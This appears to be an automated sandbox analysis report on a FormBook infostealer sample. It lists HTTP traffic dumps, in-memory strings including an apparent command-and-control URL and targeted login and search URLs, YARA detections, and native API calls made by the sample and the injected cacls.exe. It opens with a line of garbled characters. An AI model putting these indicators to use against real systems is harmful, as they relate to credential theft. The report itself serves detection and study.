173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 601Connection: closeDate: Fri, 10 Jan 2025 22:42:03 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 44 69 65 20 61 6e 67 65 67 65 62 65 6e 65 20 53 65 69 74 65 20 6b 6f 6e 6e 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 77 65 72 64 65 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Die angegebene Seite konnte nicht gefunden werden. </p> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 22:42:22 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 22:42:25 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 22:42:27 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 22:42:30 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: jCNfinsYqEsIM.exe, 00000009.00000002.2620141085.0000000001623000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.glowups.life
                Source: jCNfinsYqEsIM.exe, 00000009.00000002.2620141085.0000000001623000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.glowups.life/dheh/
                Source: cacls.exe, 00000008.00000002.2624889998.0000000007EE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: cacls.exe, 00000008.00000002.2624889998.0000000007EE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: cacls.exe, 00000008.00000002.2624889998.0000000007EE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: cacls.exe, 00000008.00000002.2624889998.0000000007EE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: cacls.exe, 00000008.00000002.2624889998.0000000007EE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: cacls.exe, 00000008.00000002.2624889998.0000000007EE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: cacls.exe, 00000008.00000002.2624889998.0000000007EE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: cacls.exe, 00000008.00000002.2619118146.0000000002F41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: cacls.exe, 00000008.00000003.2149479572.0000000007EC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: cacls.exe, 00000008.00000002.2619118146.0000000002F41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
                Source: cacls.exe, 00000008.00000002.2619118146.0000000002F41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: cacls.exe, 00000008.00000002.2619118146.0000000002F41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033w
                Source: cacls.exe, 00000008.00000002.2619118146.0000000002F41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=000000004
                Source: cacls.exe, 00000008.00000002.2619118146.0000000002F41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: cacls.exe, 00000008.00000002.2619118146.0000000002F41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: cacls.exe, 00000008.00000002.2624889998.0000000007EE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 3.2.hgq5nzWJll.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.hgq5nzWJll.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.2621191548.0000000003270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2620141085.00000000015D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1967405892.0000000001B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2620684145.0000000002F80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2621124950.0000000003220000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2618678036.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1965649962.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1967699628.0000000001D20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0042C713 NtClose,3_2_0042C713
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018B2B60 NtClose,LdrInitializeThunk,3_2_018B2B60
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018B2DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_018B2DF0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018B2C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_018B2C70
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018B35C0 NtCreateMutant,LdrInitializeThunk,3_2_018B35C0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018B4340 NtSetContextThread,3_2_018B4340
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018B4650 NtSuspendThread,3_2_018B4650
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018B2B80 NtQueryInformationFile,3_2_018B2B80
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018B2BA0 NtEnumerateValueKey,3_2_018B2BA0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018B2BE0 NtQueryValueKey,3_2_018B2BE0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018B2BF0 NtAllocateVirtualMemory,3_2_018B2BF0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018B2AB0 NtWaitForSingleObject,3_2_018B2AB0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018B2AD0 NtReadFile,3_2_018B2AD0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018B2AF0 NtWriteFile,3_2_018B2AF0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018B2DB0 NtEnumerateKey,3_2_018B2DB0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018B2DD0 NtDelayExecution,3_2_018B2DD0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018B2D00 NtSetInformationFile,3_2_018B2D00
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018B2D10 NtMapViewOfSection,3_2_018B2D10
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018B2D30 NtUnmapViewOfSection,3_2_018B2D30
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018B2CA0 NtQueryInformationToken,3_2_018B2CA0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018B2CC0 NtQueryVirtualMemory,3_2_018B2CC0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018B2CF0 NtOpenProcess,3_2_018B2CF0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018B2C00 NtQueryInformationProcess,3_2_018B2C00
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018B2C60 NtCreateKey,3_2_018B2C60
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018B2F90 NtProtectVirtualMemory,3_2_018B2F90
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018B2FA0 NtQuerySection,3_2_018B2FA0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018B2FB0 NtResumeThread,3_2_018B2FB0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018B2FE0 NtCreateFile,3_2_018B2FE0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018B2F30 NtCreateSection,3_2_018B2F30
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018B2F60 NtCreateProcessEx,3_2_018B2F60
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018B2E80 NtReadVirtualMemory,3_2_018B2E80
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018B2EA0 NtAdjustPrivilegesToken,3_2_018B2EA0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018B2EE0 NtQueueApcThread,3_2_018B2EE0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018B2E30 NtWriteVirtualMemory,3_2_018B2E30
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018B3090 NtSetValueKey,3_2_018B3090
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018B3010 NtOpenDirectoryObject,3_2_018B3010
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018B39B0 NtGetContextThread,3_2_018B39B0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018B3D10 NtOpenProcessToken,3_2_018B3D10
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018B3D70 NtOpenThread,3_2_018B3D70
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_03444340 NtSetContextThread,LdrInitializeThunk,8_2_03444340
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_03444650 NtSuspendThread,LdrInitializeThunk,8_2_03444650
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_03442B60 NtClose,LdrInitializeThunk,8_2_03442B60
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_03442BE0 NtQueryValueKey,LdrInitializeThunk,8_2_03442BE0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_03442BF0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_03442BF0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_03442BA0 NtEnumerateValueKey,LdrInitializeThunk,8_2_03442BA0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_03442AD0 NtReadFile,LdrInitializeThunk,8_2_03442AD0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_03442AF0 NtWriteFile,LdrInitializeThunk,8_2_03442AF0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_03442F30 NtCreateSection,LdrInitializeThunk,8_2_03442F30
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_03442FE0 NtCreateFile,LdrInitializeThunk,8_2_03442FE0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_03442FB0 NtResumeThread,LdrInitializeThunk,8_2_03442FB0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_03442EE0 NtQueueApcThread,LdrInitializeThunk,8_2_03442EE0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_03442E80 NtReadVirtualMemory,LdrInitializeThunk,8_2_03442E80
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_03442D10 NtMapViewOfSection,LdrInitializeThunk,8_2_03442D10
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_03442D30 NtUnmapViewOfSection,LdrInitializeThunk,8_2_03442D30
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_03442DD0 NtDelayExecution,LdrInitializeThunk,8_2_03442DD0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_03442DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_03442DF0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_03442C60 NtCreateKey,LdrInitializeThunk,8_2_03442C60
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_03442C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_03442C70
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_03442CA0 NtQueryInformationToken,LdrInitializeThunk,8_2_03442CA0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_034435C0 NtCreateMutant,LdrInitializeThunk,8_2_034435C0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_034439B0 NtGetContextThread,LdrInitializeThunk,8_2_034439B0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_03442B80 NtQueryInformationFile,8_2_03442B80
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_03442AB0 NtWaitForSingleObject,8_2_03442AB0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_03442F60 NtCreateProcessEx,8_2_03442F60
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_03442F90 NtProtectVirtualMemory,8_2_03442F90
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_03442FA0 NtQuerySection,8_2_03442FA0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_03442E30 NtWriteVirtualMemory,8_2_03442E30
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_03442EA0 NtAdjustPrivilegesToken,8_2_03442EA0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_03442D00 NtSetInformationFile,8_2_03442D00
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_03442DB0 NtEnumerateKey,8_2_03442DB0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_03442C00 NtQueryInformationProcess,8_2_03442C00
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_03442CC0 NtQueryVirtualMemory,8_2_03442CC0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_03442CF0 NtOpenProcess,8_2_03442CF0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_03443010 NtOpenDirectoryObject,8_2_03443010
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_03443090 NtSetValueKey,8_2_03443090
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_03443D70 NtOpenThread,8_2_03443D70
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_03443D10 NtOpenProcessToken,8_2_03443D10
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_02C78FA0 NtCreateFile,8_2_02C78FA0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_02C792B0 NtClose,8_2_02C792B0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_02C79210 NtDeleteFile,8_2_02C79210
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_02C79110 NtReadFile,8_2_02C79110
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_02C79420 NtAllocateVirtualMemory,8_2_02C79420
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 0_2_02AADD140_2_02AADD14
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 0_2_051B76C80_2_051B76C8
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 0_2_051B00060_2_051B0006
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 0_2_051B00400_2_051B0040
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 0_2_051B76B80_2_051B76B8
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 0_2_0528E1900_2_0528E190
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 0_2_0528E1800_2_0528E180
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 0_2_071C6E180_2_071C6E18
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 0_2_071CFA500_2_071CFA50
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 0_2_071CA7D80_2_071CA7D8
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 0_2_071CA7C80_2_071CA7C8
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 0_2_071CA3A00_2_071CA3A0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 0_2_071CC0180_2_071CC018
